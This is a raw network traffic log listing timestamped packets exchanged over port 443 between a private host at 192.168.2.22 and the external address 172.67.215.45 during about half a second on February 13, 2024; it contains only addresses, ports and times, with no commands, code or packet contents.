Feb 13, 2024 15:08:05.819117069 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.819123983 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.819820881 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.819852114 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.819861889 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.819866896 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.819896936 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.819900036 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.820583105 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.820641041 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.820645094 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.820692062 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.820724964 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.820753098 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.820755005 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.820761919 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.820795059 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.821513891 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.821572065 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.821599960 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.821629047 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.821633101 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.821706057 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.822331905 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.822402954 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.822442055 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.822447062 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.932921886 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.933001995 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.933010101 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.933546066 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.933554888 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.933588028 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.933592081 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.933809042 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.934350967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.934357882 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.934393883 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.935058117 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.935065985 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.935100079 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.935110092 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.935117006 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.935144901 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.935671091 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.935678005 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.936502934 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.936625004 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.936630011 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.937124014 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.937167883 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.937175035 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.937175989 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.937196016 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.937200069 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.937916040 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.937971115 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.937977076 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.938724041 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.938760996 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.938765049 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.938795090 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.938848019 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.938852072 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.939560890 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.939604044 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.939608097 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.940326929 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.940367937 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.940372944 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.940399885 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.940442085 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.940444946 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.942395926 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.983458996 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.983500004 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.983515978 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:05.983527899 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:05.983542919 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.050203085 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.050265074 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.050280094 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.050651073 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.050709963 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.050714970 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.051137924 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.051176071 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.051184893 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.051186085 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.051213980 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.051227093 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.052014112 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.052064896 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.052071095 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.052833080 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.052872896 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.052882910 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.052886963 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.052925110 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.053734064 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.053774118 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.053786039 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.053790092 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.053828955 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.054635048 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.054687977 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.054692984 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.055439949 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.055476904 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.055497885 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.055502892 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.055531025 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.056324959 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.056375980 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.056379080 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.057246923 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.057281017 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.057298899 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.057301998 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.057337046 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.057996988 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.058054924 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.058059931 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.058760881 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.058811903 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.058816910 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.058855057 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.058901072 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.058904886 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.059737921 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.059808016 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.059813023 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.060955048 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.061014891 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.061017990 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.061027050 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.061067104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.062319994 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.062346935 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.062361002 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.062386990 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.062391043 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.062402010 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.064909935 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.064946890 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.064980984 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.064986944 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.065011978 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.066541910 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.066567898 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.066603899 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.066606045 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.066617012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.066617966 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.066653967 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.069116116 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.069144964 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.069173098 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.069178104 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.069205999 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.071055889 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.071079969 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.071110964 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.071115971 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.071141005 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.073662996 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.073690891 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.073729992 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.073735952 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.073746920 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.075323105 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.075346947 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.075382948 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.075388908 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.075412989 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.102364063 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.102400064 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.102433920 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.102442980 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.102454901 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.102463961 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.104048967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.104074955 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.104146004 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.104151011 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.104175091 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.104217052 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.168706894 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.168747902 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.168797970 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.168812990 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.168828964 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.168843985 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.170892954 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.170923948 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.170953035 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.170958996 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.170972109 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.172648907 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.172677994 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.172719955 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.172725916 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.172736883 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.172794104 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.175179005 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.175211906 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.175232887 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.175237894 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.175250053 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.175278902 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.176959038 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.176985979 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.177016973 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.177021980 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.177033901 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.177124977 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.179550886 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.179579973 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.179615974 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.179620981 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.179630995 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.181385040 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.181412935 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.181440115 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.181444883 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.181472063 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.183906078 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.183933973 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.183984041 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.183990002 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.184000015 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.184007883 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.186356068 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.186391115 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.186409950 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.186414003 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.186439037 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.188222885 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.188246012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.188280106 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.188287973 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.188298941 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.190829992 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.190857887 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.190886974 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.190891981 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.190903902 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.190927982 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.192635059 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.192656994 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.192703962 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.192703962 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.192712069 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.192723036 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.195095062 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.195122957 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.195152998 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.195158005 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.195179939 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.196935892 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.196959972 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.196985960 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.196990967 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.197012901 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.199379921 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.199409962 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.199439049 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.199445009 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.199459076 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.201344013 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.201368093 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.201396942 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.201404095 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.201414108 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.203818083 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.203846931 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.203876019 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.203881979 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.203893900 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.205642939 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.205666065 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.205754995 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.205780983 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.205794096 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.208184004 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.208213091 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.208251953 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.208261013 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.208276987 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.210697889 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.210720062 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.210762024 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.210774899 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.210797071 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.212558031 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.212585926 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.212646961 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.212656021 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.212671041 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.214385033 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.214409113 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.214447975 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.214454889 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.214469910 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.216878891 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.216909885 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.216944933 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.216950893 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.216979980 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.219662905 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.219686985 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.219731092 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.219738007 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.219769001 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.221520901 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.221548080 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.221582890 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.221589088 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.221611023 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.224061012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.224083900 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.224127054 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.224143028 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.224153996 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.225883007 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.225917101 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.225950003 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.225955009 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.225981951 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.286315918 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.286353111 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.286541939 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.286541939 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.286560059 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.287930012 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.287961960 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.287993908 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.288001060 CET	443	49169	172.67.215.45	192.168.2.22
Feb 13, 2024 15:08:06.288032055 CET	49169	443	192.168.2.22	172.67.215.45
Feb 13, 2024 15:08:06.290518045 CET	443	49169	172.67.215.45	192.168.2.22
